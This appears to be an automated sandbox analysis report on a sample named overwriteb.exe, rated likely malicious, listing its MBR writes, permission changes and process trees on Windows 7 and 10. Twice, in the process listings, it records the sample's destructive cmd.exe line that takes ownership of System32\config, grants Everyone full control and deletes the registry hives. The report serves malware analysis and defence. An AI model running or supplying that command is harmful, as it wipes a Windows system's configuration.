Malware Analysis Report

2024-11-16 12:48

Sample ID 240810-sq7jtsyhqc
Target overwriteb.exe
SHA256 aea7dd8d80a173706820c402bbc7ff82df66ae3946a982fda9dbfd5d08c5b656
Tags
bootkit discovery exploit persistence
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

aea7dd8d80a173706820c402bbc7ff82df66ae3946a982fda9dbfd5d08c5b656

Threat Level: Likely malicious

The file overwriteb.exe was found to be: Likely malicious.

Malicious Activity Summary

bootkit discovery exploit persistence

Possible privilege escalation attempt

Checks computer location settings

Modifies file permissions

Writes to the Master Boot Record (MBR)

Enumerates physical storage devices

Unsigned PE

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-10 15:20

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-10 15:20

Reported

2024-08-10 15:23

Platform

win7-20240708-en

Max time kernel

117s

Max time network

118s

Command Line

"C:\Users\Admin\AppData\Local\Temp\overwriteb.exe"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File created \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\overwriteb.exe N/A

Enumerates physical storage devices

Processes

C:\Users\Admin\AppData\Local\Temp\overwriteb.exe

"C:\Users\Admin\AppData\Local\Temp\overwriteb.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f %SystemRoot%\System32\config\* > NUL && icacls %SystemRoot%\System32\config\* /grant Everyone:(F) > NUL && del /s /q %SystemRoot%\System32\config\* > NUL 2>&1 && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\config\*

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\config\* /grant Everyone:(F)

Network

N/A

Files

memory/1864-0-0x000000013F180000-0x000000013F31F000-memory.dmp

memory/1864-1-0x000000013F180000-0x000000013F31F000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-10 15:20

Reported

2024-08-10 15:21

Platform

win10v2004-20240802-en

Max time kernel

34s

Max time network

36s

Command Line

"C:\Users\Admin\AppData\Local\Temp\overwriteb.exe"

Signatures

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\overwriteb.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File created \??\PhysicalDrive0 C:\Users\Admin\AppData\Local\Temp\overwriteb.exe N/A

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3876 wrote to memory of 3532 N/A C:\Users\Admin\AppData\Local\Temp\overwriteb.exe C:\Windows\System32\cmd.exe
PID 3876 wrote to memory of 3532 N/A C:\Users\Admin\AppData\Local\Temp\overwriteb.exe C:\Windows\System32\cmd.exe
PID 3532 wrote to memory of 4868 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 3532 wrote to memory of 4868 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 3532 wrote to memory of 2264 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 3532 wrote to memory of 2264 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe

Processes

C:\Users\Admin\AppData\Local\Temp\overwriteb.exe

"C:\Users\Admin\AppData\Local\Temp\overwriteb.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f %SystemRoot%\System32\config\* > NUL && icacls %SystemRoot%\System32\config\* /grant Everyone:(F) > NUL && del /s /q %SystemRoot%\System32\config\* > NUL 2>&1 && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\config\*

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\config\* /grant Everyone:(F)

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 147.142.123.92.in-addr.arpa udp

Files

memory/3876-0-0x00007FF699B20000-0x00007FF699CBF000-memory.dmp

memory/3876-1-0x00007FF699B20000-0x00007FF699CBF000-memory.dmp